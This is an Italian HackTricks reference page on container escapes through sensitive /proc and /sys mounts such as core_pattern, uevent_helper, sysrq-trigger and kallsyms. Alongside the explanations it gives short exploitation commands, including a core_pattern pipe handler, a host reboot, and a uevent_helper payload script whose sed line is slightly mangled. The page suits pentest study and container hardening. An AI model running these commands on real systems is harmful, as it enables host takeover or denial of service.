7.4 KiB
Sensitive Mounts
{{#include ../../../../banners/hacktricks-training.md}}
L'esposizione di /proc e /sys senza un'adeguata isolamento dei namespace introduce significativi rischi per la sicurezza, inclusi l'ampliamento della superficie di attacco e la divulgazione di informazioni. Questi directory contengono file sensibili che, se mal configurati o accessibili da un utente non autorizzato, possono portare a fuga dal container, modifica dell'host o fornire informazioni che facilitano ulteriori attacchi. Ad esempio, montare in modo errato -v /proc:/host/proc può eludere la protezione di AppArmor a causa della sua natura basata su percorso, lasciando /host/proc non protetto.
Puoi trovare ulteriori dettagli su ciascuna potenziale vulnerabilità in https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts.
Vulnerabilità di procfs
/proc/sys
Questa directory consente l'accesso per modificare le variabili del kernel, di solito tramite sysctl(2), e contiene diverse sottodirectory di interesse:
/proc/sys/kernel/core_pattern
- Descritto in core(5).
- Consente di definire un programma da eseguire alla generazione di un file di core con i primi 128 byte come argomenti. Questo può portare all'esecuzione di codice se il file inizia con una pipe
|. - Esempio di test e sfruttamento:
[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test di accesso in scrittura
cd /proc/sys/kernel
echo "|$overlay/shell.sh" > core_pattern # Imposta gestore personalizzato
sleep 5 && ./crash & # Attiva gestore
/proc/sys/kernel/modprobe
- Dettagliato in proc(5).
- Contiene il percorso per il caricatore di moduli del kernel, invocato per caricare i moduli del kernel.
- Esempio di controllo accesso:
ls -l $(cat /proc/sys/kernel/modprobe) # Controlla accesso a modprobe
/proc/sys/vm/panic_on_oom
- Riferito in proc(5).
- Un flag globale che controlla se il kernel va in panico o invoca l'oom killer quando si verifica una condizione OOM.
/proc/sys/fs
- Secondo proc(5), contiene opzioni e informazioni sul file system.
- L'accesso in scrittura può abilitare vari attacchi di denial-of-service contro l'host.
/proc/sys/fs/binfmt_misc
- Consente di registrare interpreti per formati binari non nativi basati sul loro numero magico.
- Può portare a escalation dei privilegi o accesso a shell root se
/proc/sys/fs/binfmt_misc/registerè scrivibile. - Sfruttamento e spiegazione rilevanti:
- Poor man's rootkit via binfmt_misc
- Tutorial approfondito: Video link
Altri in /proc
/proc/config.gz
- Può rivelare la configurazione del kernel se
CONFIG_IKCONFIG_PROCè abilitato. - Utile per gli attaccanti per identificare vulnerabilità nel kernel in esecuzione.
/proc/sysrq-trigger
- Consente di invocare comandi Sysrq, potenzialmente causando riavvii immediati del sistema o altre azioni critiche.
- Esempio di riavvio dell'host:
echo b > /proc/sysrq-trigger # Riavvia l'host
/proc/kmsg
- Espone i messaggi del buffer di anello del kernel.
- Può aiutare negli exploit del kernel, perdite di indirizzi e fornire informazioni sensibili sul sistema.
/proc/kallsyms
- Elenca i simboli esportati dal kernel e i loro indirizzi.
- Essenziale per lo sviluppo di exploit del kernel, specialmente per superare KASLR.
- Le informazioni sugli indirizzi sono limitate con
kptr_restrictimpostato su1o2. - Dettagli in proc(5).
/proc/[pid]/mem
- Interfaccia con il dispositivo di memoria del kernel
/dev/mem. - Storicamente vulnerabile ad attacchi di escalation dei privilegi.
- Maggiori informazioni su proc(5).
/proc/kcore
- Rappresenta la memoria fisica del sistema in formato ELF core.
- La lettura può rivelare i contenuti della memoria del sistema host e di altri container.
- La grande dimensione del file può portare a problemi di lettura o crash del software.
- Uso dettagliato in Dumping /proc/kcore in 2019.
/proc/kmem
- Interfaccia alternativa per
/dev/kmem, rappresenta la memoria virtuale del kernel. - Consente lettura e scrittura, quindi modifica diretta della memoria del kernel.
/proc/mem
- Interfaccia alternativa per
/dev/mem, rappresenta la memoria fisica. - Consente lettura e scrittura, la modifica di tutta la memoria richiede la risoluzione degli indirizzi virtuali in fisici.
/proc/sched_debug
- Restituisce informazioni sulla pianificazione dei processi, eludendo le protezioni del namespace PID.
- Espone nomi di processi, ID e identificatori cgroup.
/proc/[pid]/mountinfo
- Fornisce informazioni sui punti di montaggio nel namespace di montaggio del processo.
- Espone la posizione del
rootfso dell'immagine del container.
Vulnerabilità di /sys
/sys/kernel/uevent_helper
- Utilizzato per gestire i
ueventsdei dispositivi del kernel. - Scrivere in
/sys/kernel/uevent_helperpuò eseguire script arbitrari al verificarsi diuevent. - Esempio di sfruttamento: %%%bash
Crea un payload
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
Trova il percorso host dal montaggio OverlayFS per il container
hostpath=$(sed -n 's/.\perdir=([^,]_).*/\1/p' /etc/mtab)
Imposta uevent_helper su helper malevolo
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
Attiva un uevent
echo change > /sys/class/mem/null/uevent
Legge l'output
cat /output %%%
/sys/class/thermal
- Controlla le impostazioni di temperatura, potenzialmente causando attacchi DoS o danni fisici.
/sys/kernel/vmcoreinfo
- Rilascia indirizzi del kernel, potenzialmente compromettendo KASLR.
/sys/kernel/security
- Contiene l'interfaccia
securityfs, che consente la configurazione dei moduli di sicurezza Linux come AppArmor. - L'accesso potrebbe consentire a un container di disabilitare il proprio sistema MAC.
/sys/firmware/efi/vars e /sys/firmware/efi/efivars
- Espone interfacce per interagire con le variabili EFI in NVRAM.
- Mal configurazione o sfruttamento possono portare a laptop bloccati o macchine host non avviabili.
/sys/kernel/debug
debugfsoffre un'interfaccia di debug "senza regole" al kernel.- Storia di problemi di sicurezza a causa della sua natura illimitata.
Riferimenti
- https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts
- Understanding and Hardening Linux Containers
- Abusing Privileged and Unprivileged Linux Containers
{{#include ../../../../banners/hacktricks-training.md}}